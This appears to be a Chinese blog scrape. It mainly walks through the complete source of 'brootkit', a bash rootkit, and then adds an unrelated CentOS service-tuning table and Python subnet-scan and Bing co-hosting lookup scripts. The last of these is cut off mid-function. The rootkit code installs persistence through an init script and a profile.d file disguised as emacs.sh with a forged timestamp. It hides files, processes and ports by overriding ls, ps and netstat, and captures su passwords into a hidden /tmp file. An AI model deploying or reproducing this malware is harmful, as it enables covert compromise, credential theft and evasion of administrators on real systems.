        while read line
        do
                [ "${line:0:1}" == "#" -a -z "$line" ] && continue

                arg1=`echo $line | cut -d " " -f 1`
                arg2=`echo $line | cut -d " " -f 2`

                case $arg1 in
                        "HIDE_PORT")
                                br_hide_port=$arg2;;
                        "HIDE_FILE")
                                br_hide_file=$arg2;;
                        "HIDE_PROC")
                                br_hide_proc=$arg2;;
                        "REMOTE_HOST")
                                br_remote_host=$arg2;;
                        "REMOTE_PORT")
                                br_remote_port=$arg2;;
                        "SLEEP_TIME")
                                br_sleep_time=$arg2;;
                esac
        done < $1
}

function display_array()
{
    declare -a arg_tmp=$1
    local arg old_ifs

    old_ifs=$IFS; IFS=","
    for arg in ${arg_tmp[@]}
    do
        echo $arg
    done
    IFS=$old_ifs
}

function br_display_config()
{
        echo -e "HIDE_PORT:"
    display_array $br_hide_port
        echo -e "HIDE_FILE:"
    display_array $br_hide_file
        echo -e "HIDE_PROC:"
    display_array $br_hide_proc
        echo -e "REMOTE_HOST:"
    display_array $br_remote_host
        echo -e "REMOTE_PORT:"
    display_array $br_remote_port
        echo -e "SLEEP_TIME:"
    echo $br_sleep_time
}

根据man手册, declare -a的意思是声明一个数组

An array is created automatically if any variable is assigned to using
the syntax name[subscript]=value. The subscript is treated as an
arithmetic expression that must evaluate to a number greater than or
equal to zero. To explicitly declare an array, use declare -a name
(see SHELL BUILTIN COMMANDS below). declare -a name[subscript] is also
accepted; the subscript is ignored. Attributes may be specified for an
array variable using the declare and readonly builtins. Each attribute
applies to all members of an array.

这是brget.sh的内容, 用bash些的一个发送get请求的脚本, 用到了bash的特性, 就是发起tcp连接并且打开文件描述符连接到这个tcp连接

#!/bin/bash

declare remote_host
declare remote_port
declare remote_file
declare remote_file_len

function sock_read()
{
    local line tmp

    read -u 9 -t 5 line
    if ! echo $line|grep -e "200 OK" >/dev/null; then
        echo $line
        rm -f $remote_file
        socket_close
        exit
    else
        echo "response 200 ok."
    fi

    while read -u 9 -t 5 line
    do
        if [ ${#line} -eq 1 ]; then
            break
        fi

        tmp=`echo $line|cut -d " " -f 1`
        if [ "$tmp" == "Content-Length:" ]; then
            remote_file_len=`echo $line|cut -d " " -f 2`
        fi
    done

    echo "length: $remote_file_len"
    while read -u 9 -t 5 line
    do
        echo -e "$line" >>$remote_file
    done
}

function sock_write()
{
    local buf

    buf="GET /$3 http/1.0\r\nHost: $1:$2\r\n"
    echo -e $buf >&9
    [ $? -eq 0 ] && echo "send http request ok." || echo "send http request failed."
}

function socket_create()
{
    exec 9<> /dev/tcp/$1/$2
    [ $? -eq 0 ] && echo "connect to $1:$2 ok." || echo "connect to $1:$2 failed."
}

function socket_close()
{
    exec >&9-
    [ $? -ne 0 ] && echo "close socket failed."
}

function parse_url()
{
    local url=$1

    url=${url#http://}
    remote_file=${url#*/}
    remote_host=`echo $url | awk -F '/' '{print $1}'`
    remote_port=`echo $remote_host | awk -F ':' '{print $2}'`
    remote_host=`echo $remote_host | awk -F ':' '{print $1}'`

    [ "$remote_port" == "" ] && remote_port=80
}

function file_init()
{
    [ -f $remote_file ] && rm -f $remote_file || touch $remote_file
}

function display_start()
{
    local tmp

    tmp=`date +'%F %T'` 
    tmp="--$tmp-- $1"
    echo -e $tmp
}

function display_finsh()
{
    local tmp

    tmp=`date +'%F %T'` 
    tmp="\n--$tmp-- - $remote_file saved $remote_file_len"
    echo -e "$tmp"
}

function wget_usage()
{
    echo -e "$0 <url>\n"
    echo "exp:"
    echo "$0 http://www.baidu.com/index.html"
    echo "$0 http://www.baidu.com:80/index.html"
}

function main()
{
    if [ $# -eq 0 ]; then
        wget_usage $1
        exit
    fi

    parse_url $@

    file_init
    display_start $1
    socket_create $remote_host $remote_port
    sock_write $remote_host $remote_port $remote_file
    sock_read
    display_finsh
    socket_close
}

main $@

用起来就像这样

MacOS:trunk cc$ bash brget.sh http://g.cn
--2015-01-20 22:33:20-- http://g.cn
connect to g.cn:80 ok.
send http request ok.
HTTP/1.0 400 Bad Request
MacOS:trunk cc$

brscan.sh, 看名字就知道了, 是一个端口扫描的东西, 看代码, 也用到了bash的发起tcp连接的特性

#!/bin/bash

declare br_remote_host="localhost"
declare -a br_ports
declare -a br_open_ports
declare br_port_num=0
declare br_curr_port_num=0
declare br_open_port_num=0
declare br_thread_num=0
declare br_timeout=2
declare br_logfile="brscan.log"
declare total_run_time
declare max_row_num

declare -a playx=('/' '|' '\\' '-')
declare playx_len=4

declare max_col_num=64
declare base_row=0
declare base_col=1
declare cur_col=2
declare total_port=10
declare cur_port=0

function br_run_play()
{
        local i x y tmp_col

        tmp_col=$((br_curr_port_num * max_col_num / br_port_num))

        i=$((max_row_num+1))
        [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

        for ((i = 1; i < $tmp_col; i++))
        do
                y=$((base_col+i))
                [ $y -gt $max_col_num ] && break
                echo -ne "\033[${x};${y}H>\033[?25l"
        done
}

function br_play_init()
{
        local x y i

        i=$((max_row_num+1))
        [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

        echo -ne "\033[${x};${base_col}H\033[33m[\033[0m"

        y=$((max_col_num+1))
        echo -ne "\033[${x};${y}H\033[33m]\033[0m"
}

function compute_run_time()
{
        local day hour min rtime

        day=$(($1/3600/24))
        hour=$(($1/3600))
        min=$(($1/60))

        if [ $min -eq 0 ]; then
                sec=$(($1%60))
        total_run_time="$sec s"
        else
                if [ $hour -eq 0 ]; then
                        sec=$(($1%60))
                        total_run_time="$min m $sec s"
                else
                        if [ $day -eq 0 ]; then
                                tmp=$(($1%3600))
                                min=$(($tmp/60))
                                sec=$(($tmp%60))
                                total_run_time="$hour h $min m $sec s"
                        else
                                # 86400 = 3600 * 24
                                tmp=$(($1%86400))
                                hour=$(($tmp/3600))
                                tmp1=$(($tmp%3600))
                                min=$(($tmp1/60))
                                sec=$(($tmp1%60))
                                total_run_time="$day d $hour h $min m $sec s"
                        fi


                fi
        fi
}

function get_run_time()
{
        local run_count local_hz run_time
    local start_time curr_time

    if [ -d "/proc/$1" ]; then
            run_count=`cat /proc/$1/stat | cut -d " " -f 22`
    else
        return 0
    fi

        local_hz=`getconf CLK_TCK`
        start_time=$(($run_count/$local_hz))

        curr_time=`cat /proc/uptime | cut -d " " -f 1 | cut -d "." -f 1`
        run_time=$((curr_time-start_time))

    return $run_time
}

function br_show_open_ports()
{
    local x y i

    get_run_time $$
    run_time=$?

    compute_run_time $run_time

    i=$((max_row_num+1))
    [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

    y=$((max_col_num+3))
    printf "\033[${x};${y}H\033[32;1m %5d/%-5d\t$total_run_time\033[0m" \
        $br_curr_port_num $br_port_num

    x=$((x+2)); y=1
    printf "\033[${x};${y}H\033[32;1m%s: ${br_open_ports[*]}\033[0m" \
        $br_remote_host 
}

# $1 => remote host
# $2 => remote port
# $3 => thread_num
function thread_scan()
{
    local tport pid pidfile sock_fd
    local i j k m=0 run_time x

    mkdir -p .scan

    for ((i = 0; i < $3; i++))
    do
        {
        let "sock_fd=$2+$i"
        let "j=$2+$i+3"
        /bin/bash -c "exec $j<> /dev/tcp/$1/${br_ports[$sock_fd]}" 2>${br_ports[$sock_fd]}
        }&
        let "k=$2+$i"
        x=$((m+3))
        if [ $x -ge $max_row_num ]; then
             m=0;x=3
        else
            ((m++))
        fi
        printf "\033[${x};1H\033[33mthread<%-5d>\t\t--\t\tpid <%-5d>\t-->\t%-5d\033[?25l" \
            $i $! ${br_ports[$k]}
        echo ${br_ports[$k]} > ".scan/$!"
        [ $br_curr_port_num -ge $br_port_num ] && break || ((br_curr_port_num++))
    done

    sleep $br_timeout

    exec 2>&-
        for pid in `jobs -p`
        do
        get_run_time $pid
        run_time=$?
        [ $run_time -eq 0 ] && continue

                if [ $run_time -ge $br_timeout ]; then
                        kill -9 $pid >/dev/null 2>&1
            rm -f ".scan/$pid"
                fi
        done

    for ((i = 0; i < $3; i++))
    do
        let "sock_fd=$2+$i"
                if [ ! -s ${br_ports[$sock_fd]} ]; then
            for pid_file in `ls .scan`
            do
                tport=`cat ".scan/$pid_file"`
                if [ $tport -eq ${br_ports[$sock_fd]} ]; then
                    br_open_ports[$br_open_port_num]=${br_ports[$sock_fd]}
                    ((br_open_port_num++))
                fi
            done
                fi

        rm -f ${br_ports[$sock_fd]}
    done

    br_run_play
    br_show_open_ports
    rm -fr .scan
}

# $1 => remote host
# $2 => thread_num
function br_scan_port()
{
    local i

    for ((i = 0; i < $br_port_num; i+=$br_thread_num))
    do
        thread_scan $br_remote_host $i $br_thread_num
    done
}

function br_show_ports()
{
    local i

    for ((i = 0; i < $br_port_num; i++))
    do
        echo ${br_ports[$i]}
    done
}

function parse_port()
{
    local start_port end_port port

    start_port=`echo $1 | cut -d "-" -f 1`
    end_port=`echo $1 | cut -d "-" -f 2`

    for ((port=$start_port; port <= $end_port; port++))
    do
        br_ports[$br_port_num]=$port
        ((br_port_num++))
    done
    ((br_port_num--))
}

function br_parse_port()
{
    declare -a ports
    local tmp_ifs port

    tmp_ifs=$IFS; IFS=','; ports=$1

    for port in ${ports[@]}
    do
        if echo $port|grep -e ".*-.*" >/dev/null; then
            parse_port $port
        else
            br_ports[$br_port_num]=$port
            ((br_port_num++))
        fi
    done
    IFS=$tmp_ifs
}

function br_show_arg()
{
    echo -ne "\033[1;1H"
    echo -ne "\033[31;1mhost: $br_remote_host | total ports: $br_port_num | thread num: $br_thread_num "
    echo -e "timeout: $br_timeout | logfile: $br_logfile\n\033[0m"
}

function br_scan_init()
{
    echo -ne "\033[2J"
        MAX_ROW_NUM=`stty size|cut -d " " -f 1`
        MAX_COL_NUM=`stty size|cut -d " " -f 2`
    max_row_num=$((MAX_ROW_NUM-5))
}

function br_scan_exit()
{
    echo -e "\033[?25h"
}

function br_usage()
{
    echo -e "$1 <-p> [-n|-t|-o|-h] <remote_host>\n"
    echo -e "option:"
    echo -e "-p\t\tports, pattern: port1,port2,port3-port7,portn..."
    echo -e "-n\t\tthread num, defalut is 10"
    echo -e "-t\t\ttimeout, default is 30s"
    echo -e "-o\t\tresults write into log file, default is brscan.log"
    echo -e "-h\t\thelp information."
    echo -e "\nexp:"
    echo -e "$1 -p 21,22,23-25,80,135-139,8080 -t 20 www.cloud-sec.org"
    echo -e "$1 -p 1-65525 -n 200 -t 20 www.cloud-sec.org"
}

function main()
{
    if [ $# -eq 0 ]; then
        br_usage $0
        exit 0
    fi

    while getopts "p:n:t:o:h" arg
    do
    case $arg in
        p)
            br_parse_port $OPTARG ;;
        n)
            br_thread_num=$OPTARG ;;
        t)
            br_timeout=$OPTARG ;;
        o)
            br_logfile=$OPTARG ;;
        h)
            br_usage $0
            exit 0
            ;;
        ?)
            echo "unkown arguments."
            exit 1
            ;;
        esac
    done

    shift $((OPTIND-1))
    br_remote_host=$@

    [ $br_port_num -lt $br_thread_num ] && br_thread_num=$br_port_num

    #br_show_ports
    br_scan_init
    br_play_init
    br_show_arg
    br_scan_port
    br_scan_exit
}

main $@

brdaemon.sh是一个把bashbd.sh放后台执行的一个脚本

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

function br_hookhup()
{
        :
}

function br_daemon()
{
    if ! type nohup >/dev/null; then
                nohup $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1
                [ $? -eq 1 ] && exit
        else
                trap br_hookhup SIGHUP
                $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1 &
                [ $? -eq 1 ] && exit
        fi
}

br_daemon

install.sh脚本就是

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

function br_rootkit()
{
    cp brootkit.sh /etc/profile.d/emacs.sh # 把rootkit脚本拷贝到指定目录, 每次打开一个登录shell的时候都会执行这个脚本
    touch -r /etc/profile.d/vim.sh /etc/profile.d/emacs.sh # 用vim.sh的时间戳来修饰emacs.sh
}

function br_hookhup()
{
    :
}

function main()
{
    mkdir -p $BR_ROOTKIT_PATH -m 0777 # 创建文件夹来存放所有文件
    [ $? -eq 1 ] && exit && echo "mkdir $BR_ROOTKIT_PATH failed."

    cp brootkit.sh br.conf br_config.sh bashbd.sh brscan.sh $BR_ROOTKIT_PATH
    [ $? -eq 1 ] && exit && echo "copy brootkit failed."

    cp brdaemon.sh /etc/rc.d/init.d/brdaemon # 复制控制脚本到系统存放控制脚本的目录
    ln -s /etc/rc.d/init.d/brdaemon /etc/rc.d/rc3.d/S10brdaemon # 在运行级别3的话就启动脚本, 适用Red Hat系列Linux
    [ $? -eq 1 ] && exit && echo "copy brdaemon failed."

    chmod 777 $BR_ROOTKIT_PATH

    if ! type nohup >/dev/null; then
        nohup $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1
        [ $? -eq 1 ] && exit && echo "install backdoor failed."
    else
        trap br_hookhup SIGHUP
        $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1 &
        [ $? -eq 1 ] && exit && echo "install backdoor failed."
    fi

    br_rootkit
    [ $? -eq 1 ] && exit && echo "install brootkit failed." || \
        echo "install brootkit successful."
}

main

根据man手册, touch -r的意思如下

-r Use the access and modifications times from the specified file instead of the current time of day.
好了, 到了最后一个脚本, 这个脚本的主要功能就是, 每次用户登录的时候就执行, 它会替换系统命令, 根据配置文件把相关的文件给隐藏掉, 就是这样

#!/bin/bash
# Lightweight rootkit implemented by bash shell scripts v0.01
#
# by wzt 2015   http://www.cloud-sec.org
#

declare -r builtin
declare -r declare
declare -r set
declare -r fake_unset
declare -r type
declare -r typeset

unalias ls >/dev/null 2>&1

BR_ROOTKIT_PATH="/usr/include/..."

function abcdmagic()
{
    :
}

function builtin()
{
    local fake_a fake_b

    unset command
    case $1 in 
        "declare"|"set"|"unset"|"command"|"type"|"typeset")
            fake_a="$(command builtin $1 $2)"
            if [ $2 == " " ];then
                fake_b=${fake_a/br_hide_file\=*/}
            else
                fake_b=${fake_a/\/bin\/ls?()*/}
            fi
            echo -n "$fake_b"
            reset_command
            return ;;
        "builtin")
            echo "bash: builtin: builtin: syntax error, bash($BASH_VERSION) is not support."
            reset_command
            return ;;
        *)
            command builtin $1 $2
            reset_command
            ;;
    esac
}

function declare()
{
    local fake_a fake_b

    unset command
    case $1 in 
        "")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        "-f"|"-F")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/\/bin\/ls?()*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        *)
            command declare $1 $2
            reset_command
            return ;;
    esac
}

function typeset()
{
    local fake_a fake_b

    unset command
    case $1 in
        ""|"-f"|"-F")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        *)
            command typeset $1 $2
            reset_command
            return ;;
    esac
}

function type()
{
    case $1 in
        "builtin"|"declare"|"set"|"unset"|"type"|"typeset")
            echo "$1 is a shell builtin"
            return ;;
        "dir")
            echo "dir is /usr/bin/dir"
            return ;;
        "ls")
            echo "ls is aliased to ls --color=tty"
            return ;;
        "ps")
            echo "ps is /bin/ps"
            return ;;
        "netstat")
            echo "netstat is hashed (/bin/netstat)"
            return ;;
        "/bin/ls"|"/usr/bin/dir"|"/bin/ps"|"/bin/netstat")
            echo "$1 is $1"
            return ;;
        *)
            unset command
            command type $1 $2
            reset_command
            return ;;
    esac
}

function set()
{
    local fake_a fake_b

    unset command
    case $1 in
        "")
            fake_a="$(command set)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        "-x"|"+x")
            return ;;
        *)
            echo $1 $2
            command set $1 $2
            reset_command
            return ;;
    esac
}

function fake_unset()
{
    case $1 in
        "builtin"|"declare"|"command"|"set"|"unset"|"type"|"typeset")
            echo "bash: syntax error, bash($BASH_VERSION) is not support."
            return ;;
        *)
            unset $1 $2
            return ;;
    esac
}

function fake_command()
{
    case $1 in
        "builtin"|"declare"|"command"|"set"|"unset"|"type"|"typeset")
            echo "bash: syntax error, bash($BASH_VERSION) is not support."
            return ;;
        *)
            unset command
            command $1 $2
            reset_command
            return ;;
    esac
}

function command()
{
    case $1 in
        "builtin")
            builtin $2 $3
            return ;;
        "declare")
            declare $2 $3
            return ;;
        "set")
            set $2 $3
            return ;;
        "unset")
            fake_unset $2 $3
            . brootkit.sh
            return ;;
        "type")
            type $2 $3
            return ;;
        "typeset")
            typeset $2 $3
            return ;;
        "command")
            fake_command $2 $3
            return ;;
        *)
            unset command
            command $2 $3
            . brootkit.sh
            return ;;
    esac
}

function reset_command()
{
    function command()
    {
        case $1 in
            "builtin")
                builtin $2 $3
                return ;;
            "declare")
                declare $2 $3
                return ;;
            "set")
                set $2 $3
                return ;;
            "unset")
                fake_unset $2 $3
                . brootkit.sh
                return ;;
            "type")
                type $2 $3
                return ;;
            "typeset")
                typeset $2 $3
                return ;;
            "command")
                fake_command $2 $3
                return ;;
            *)
                unset command
                command $2 $3
                . brootkit.sh
                return ;;
        esac
    }
}

function su()
{
    local arg_list=("" "-" "-l" "--login"
            "-c" "--command" "--session-command"
            "-f" "--fast"
            "-m" "--preserve-environment" "-p"
            "-s" "--shell=SHELL")
    local flag=0 tmp_arg arg pass

    if [ $UID -eq 0 ]; then
        /bin/su $1; unset su ; return $?
    fi

    for arg in ${arg_list[@]}
    do
        [ "$1" = "$arg" ] && flag=1
    done

    [ $# -eq 0 ] && flag=1

    tmp_arg=$1;tmp_arg=${tmp_arg:0:1};
    [ "$tmp_arg" != "-" -a $flag -eq 0 ] && flag=1

    if [ $flag -ne 1 ];then
        /bin/su $1; return $?
    fi

    [ ! -f /tmp/... ] && `touch /tmp/... && chmod 777 /tmp/... >/dev/null 2>&1`

    echo -ne "Password:\r\033[?25l"
    read -t 30 -s pass
    echo -ne "\033[K\033[?25h"

    /bin/su && unset su && echo $pass >> /tmp/...
}

unalias ls >/dev/null 2>&1

function max_file_length()
{
    local tmp_file sum=0 n=0

    for tmp_file in `/bin/ls $@`
    do
        n=${#tmp_file}
        [ $n -gt $sum ] && sum=$n
    done

    return $sum
}

function ls()
{
    local fake_file max_col_num file_format
    local hide_file hide_flag file_arg old_ifs
    local file_len=0 sum=0 n=0 display_mode=0

    max_col_num=`stty size|cut -d " " -f 2`

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    for file_arg in $@
    do
        if echo $file_arg|grep -q -e "^-.*l.*"; then
            display_mode=1; break
        fi
    done

    case $display_mode in
    0)
        unset -f /bin/ls
        max_file_length $@
        file_len=$?

        for fake_file in $(/bin/ls $@)
        do
            hide_flag=0
            old_ifs=$IFS; IFS=","
            for hide_file in ${br_hide_file[@]}
            do
                if echo "$fake_file"|grep -e "^$hide_file" >/dev/null;then
                    hide_flag=1; break
                fi
            done
                IFS=$old_ifs

            [ $hide_flag -eq  1 ] && continue

            n=${#fake_file}
            ((sum=sum+n+file_len))

            if [ $sum -gt $max_col_num ];then
                file_format="%-$file_len""s\n"
                printf $file_format $fake_file
                sum=0
            else
                file_format="%-$file_len""s "
                printf $file_format $fake_file
            fi
        done

        [ $sum -le $max_col_num ] && echo ""
        reset_ls
        return ;;
    1)  
        unset -f /bin/ls

        fake_file=`/bin/ls $@`
        old_ifs=$IFS; IFS=","
        for hide_file in ${br_hide_file[@]}
        do
            fake_file=`echo "$fake_file" | sed -e '/'$hide_file'/d'`
        done
        IFS=$old_ifs
        echo "$fake_file"
        reset_ls

        return ;;
    esac
}

function dir()
{
    ls $@
}

function /usr/bin/dir()
{
    unset -f /bin/ls
    ls $@
    reset_ls
}

function reset_ls()
{
    function /bin/ls()
    {
        unset -f /bin/ls
        ls $@
        reset_ls
    }
}

function /bin/ls()
{
    unset -f /bin/ls
    ls $@
    reset_ls
}

function ps()
{
    local proc_name hide_proc old_ifs

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    old_ifs=$IFS; IFS=","

    proc_name=`/bin/ps $@`
    for hide_proc in ${br_hide_proc[@]}
    do
        proc_name=`echo "$proc_name" | sed -e '/'$hide_proc'/d'`
    done

    echo "$proc_name"
    IFS=$old_ifs
}

function reset_ps()
{
    function /bin/ps()
    {
        unset -f /bin/ps
        ps $@
        reset_ps
    }
}

function /bin/ps()
{
    unset -f /bin/ps
    ps $@
    reset_ps
}

function netstat()
{
    local hide_port tmp_port old_ifs

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    old_ifs=$IFS; IFS=","
    tmp_port=`/bin/netstat $@`
    for hide_port in ${br_hide_port[@]}
    do
        tmp_port=`echo "$tmp_port" | sed -e '/'$hide_port'/d'`
    done
    echo "$tmp_port"
    IFS=$old_ifs
}

function reset_netstat()
{
    function /bin/netstat()
    {
        unset -f /bin/netstat
        netstat $@
        reset_netstat
    }
}

function /bin/netstat()
{
    unset -f /bin/netstat
    netstat $@
    reset_netstat
}

 

centos开机启动服务优化笔记

发布时间:June 2, 2015 // 分类:运维工作,工作日志,linux,转帖文章 // No Comments

默认开机启动服务列表:

服务名称 功能 默认 建议 备注说明
NetworkManager 用于自动连接网络,常用在Laptop上 开启 关闭 对服务器无用  服务器一般固定配置网络,不会自动获取ip等
abrt-ccpp   开启 自定 对服务器无用
abrt-oops   开启 自定 对服务器无用
abrtd   开启 自定 对服务器无用
acpid 电源的开关等检测管理,常用在Laptop上 开启 自定 对服务器无用
atd 在指定时间执行命令 开启 关闭 如果用crond,则可关闭它
auditd 审核守护进程 开启 开启 如果用selinux,需要开启它
autofs 文件系统自动加载和卸载 开启 自定 只在需要时开启它,可以关闭
avahi-daemon 本地网络服务查找 开启 关闭 对服务器无用
avahi-dnsconfd avahi DNS 关闭 关闭 对服务器无用
bluetooth 蓝牙无线通讯 开启 关闭 对服务器无用
dund 蓝牙相关 开启 关闭 对服务器无用
hidd 蓝牙相关 开启 关闭 对服务器无用
pand 蓝牙相关 关闭 关闭  
conman 控制台管理 关闭 关闭 无用
certmonger   关闭 关闭  
cpuspeed 调节cpu速度用来省电,常用在Laptop上 开启 关闭 对服务器无用
crond 计划任务管理 开启 开启 常用,开启
cups 通用unix打印服务 开启 关闭 对服务器无用
dnsmasq dns cache 关闭 关闭 DNS缓存服务,无用
firstboot 系统安装后初始设定 关闭 关闭  
fcoe Open-FCoE  initiator    以太网光纤通信 开启 关闭 除非服务器光纤直连,否则无用
gpm 控制台下的鼠标支持 开启 开启  
haldaemon 硬件信息收集服务 开启 开启  
ibmasm ibm硬件管理 关闭 关闭  
ip6tables ipv6防火墙 开启 关闭 用到ipv6网络的就用,一般关闭
iptables ipv4防火墙 开启 开启 ipv4防火墙服务
irda 红外线通信 关闭 关闭 无用
irqbalance cpu负载均衡 开启 自定 多核cup需要
iscsi 网络存储相关 开启 关闭  
iscsid 网络存储相关 开启 关闭  
kdump 硬件变动检测 关闭 关闭 服务器无用
kudzu 硬件变动检测 低版本的系统中 关闭 关闭 对服务器无用
livesys 安装系统相关服务 开启 关闭  
livesys-late 安装系统相关服务 开启 关闭  
lvm2-monitor lvm监视 开启 自定 如果使用LVM逻辑卷管理就开启
blk-availability lvm2相关 开启 自定 如果用lvm,则建议开启,否则不需要
mcstrans 在开启selinux时用于检查context 开启 关闭  
matahari-broker   关闭 关闭 此服务不清楚,我关闭
matahari-host   关闭 关闭 此服务不清楚,我关闭
matahari-network   关闭 关闭 此服务不清楚,我关闭
matahari-service   关闭 关闭 此服务不清楚,我关闭
matahari-sysconfig   关闭 关闭 此服务不清楚,我关闭
mdmonitor 软raid监视 开启 自定  使用软raid的服务器开启
mdmpd 软raid管理 关闭 关闭  
multipathd   关闭 关闭  
messagebus 负责在各个系统进程之间传递消息 开启 开启 如停用,haldaemon启动会失败
microcode_ctl cpu微码管理升级 开启 关闭  
netconsole   关闭 关闭  
netfs 系统启动时自动挂载网络文件系统 开启 关闭 如果使用nfs服务,就开启
network 系统启动时激活所有网络接口 开启 开启 网络基础服务,必需!
netplugd 网线热插拔监视 关闭 关闭  
nfs 网络文件系统 关闭 关闭 nfs文件服务,用到就开启
nfslock nfs相关 开启 关闭 nfs相关服务,用到就开启
nscd name cache,应该与DNS相关 关闭 关闭  
ntpd 自动对时工具 关闭 自定 网络对时服务,用到就开启
ntpdate 自动对时工具 关闭 关闭  
oddjobd 与D-BUS相关 关闭 关闭  
portreserve RPC 服务相关 开启 自定 可以关闭
pcscd pc/sc smart card daemon 开启  关闭  
portmap 使用NFS、NIS时的port map 开启 关闭  
postfix 替代sendmail的邮件服务器 开启 自定 如果无邮件服务,可关闭
psacct 负荷检测 关闭 关闭 可以关闭
qpidd 消息通信 开启 开启  
quota_nld   关闭 关闭 可以关闭
rdisc 自动检测路由器 关闭 关闭  
rawdevices raw设备支持 开启 开启  
readahead_early 提前预读相关 开启 开启  
readahead_later   关闭 关闭  
restorecond selinux相关 关闭 关闭 如果开启了selinux,就需开启
rpcbind   开启 开启 关键的基础服务,nfs服务和桌面环境都依赖此服务!相当于CentOS 5.x里面的portmap服务。
rpcgssd NFS相关 开启 关闭 NFS相关服务,可选
rpcidmapd RPC name to UID/GID mapper 开启 关闭 NFS相关服务,可选
rpcsvcgssd NFS相关 关闭 关闭 NFS相关服务,可选
rsyslog 提供系统的登录档案记录 开启 开启 系统日志关键服务,必需!
syslog 系统日志相关 开启 开启  
saslauthd sasl认证服务相关 关闭 关闭  
smartd 硬盘自动检测守护进程 关闭 关闭  
spice-vdagentd   开启 开启  
sshd ssh服务端,可提供安全的shell登录 开启 开启 SSH远程登录服务,必需!
sssd   关闭 关闭  
sendmail 邮件服务 开启 自定义  
sysstat   开启 开启 一组系统监控工具的服务,常用
tcsd   关闭 关闭  
udev-post 设备管理系统 开启 开启  
wdaemon   关闭 关闭  
wpa_supplicant 无线认证相关 关闭 关闭  
xfs x windows相关 开启 关闭  
ypbind network information service客户端 关闭 关闭  
yum-updatesd yum自动升级 开启 关闭  

查看当前开机启动服务列表

chkconfig --list | grep '3:on' | awk '{print $1}'

我的优化项目

chkconfig bluetooth off
chkconfig auditd off
chkconfig cups off
chkconfig yum-updatesd off
chkconfig smartd off
chkconfig sendmail off
chkconfig ip6tables off
chkconfig atd off
chkconfig iscsi off
chkconfig iscsid off
chkconfig microcode_ctl off

需要因机器和环境而异,仅做记录备忘。

推荐阅读

《生产服务器环境最小化安装后 Centos 6.5优化配置》http://www.lvtao.net/server/centos-server-setup.html

python实现的Bing查询

发布时间:May 15, 2015 // 分类:运维工作,工作日志,代码学习,python // No Comments

import re
import requests


r = requests.get('http://www.bing.com/search?q=ip:'+ip+'&count=50')
responseHtml = r.content
match = re.findall(r'<li class=\"b_algo\"><h2><a href=\"(.*?)\"', responseHtml)
#print match
for val in match:
    print val

继续进行批量查询

#-*- coding: utf-8 -*-
import socket
import sys
import json
import requests
import re
import time
import thread
  
def scan(ip_str):
    '''
    检测扫描端口是否开启
    然后利用bing旁站进行遍历
    '''
    port = '80'
    cs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    address=(str(ip_str),int(port))
    status = cs.connect_ex((address))
    #若返回的结果为0表示端口开启
    if(status == 0):
        print ip_str
        res = requests.get('http://www.bing.com/search?q=ip:'+ip_str+'&count=50')
        match = re.findall(r'<li class=\"b_algo\"><h2><a href=\"(.*?)\"', res.content)
        for val in match:
            print val
    cs.close()
       
def find_ip(ip_prefix):
    '''
    给出当前的192.168.1 ,然后扫描整个段所有地址
    '''
    for i in range(1,256):
        ip = '%s.%s'%(ip_prefix,i)
        thread.start_new_thread(scan, (ip,))
        time.sleep(0.3)
        
if __name__ == "__main__":
    commandargs = sys.argv[1:]
    args = "".join(commandargs)    
      
    ip_prefix = '.'.join(args.split('.')[:-1])
    find_ip(ip_prefix)

附加上另外一个验证的脚本

Uses Bing search engine to identify (and validate) websites hosted on the same web server

#!/usr/bin/python

import socket, sys, re, urllib2, StringIO, gzip, zlib
from bs4 import BeautifulSoup
import tldextract

if len(sys.argv) <> 2:
    print '\n[!] Two arguments required.'
    print 'Example: python neighbs.py www.website.com'
    print 'Example: python neighbs.py 1.2.3.4'
    sys.exit()
else:
    sharedHost = sys.argv[1]
    duplicateCheckList = []

def validateHostIP(target):
    isIP = re.match("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$", target)
    isHostName = re.match("^(([a-zA-Z]|[a-zA-Z][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z]|[A-Za-z][A-Za-z0-9\-]*[A-Za-z0-9])$", target)
    if isIP:
        return 'IP'
    elif isHostName:
        return 'HOSTNAME'
    else:
        return False

def resolve(target):
    if hasattr(socket, 'setdefaulttimeout'):
        socket.setdefaulttimeout(3)
    try:
        peos = socket.gethostbyaddr(target)
        return peos[2][0]
    except:
        return False

def make_requests(sharedTarget):
    response = [None]
    responseText = None

    for requests in range (1, 101):
        if(request_www_bing_com(response, requests, sharedTarget)):
            responseText = read_response(response[0])
            soup = BeautifulSoup(responseText)
            for A in soup.find_all('a', href=True):
                domain = str('.'.join(list(tldextract.extract(A['href']))[:10]))
                if not domain.startswith('.') and not len(domain) < 4:
                    if domain not in duplicateCheckList:
                        if resolve(sharedHost) == resolve(domain):
                            duplicateCheckList.append(domain)
                            print '[+] '+domain
                domain = ''
            
            response[0].close()

def read_response(response):
    if response.info().get('Content-Encoding') == 'gzip':
        buf = StringIO.StringIO(response.read())
        return gzip.GzipFile(fileobj=buf).read()

    elif response.info().get('Content-Encoding') == 'deflate':
        decompress = zlib.decompressobj(-zlib.MAX_WBITS)
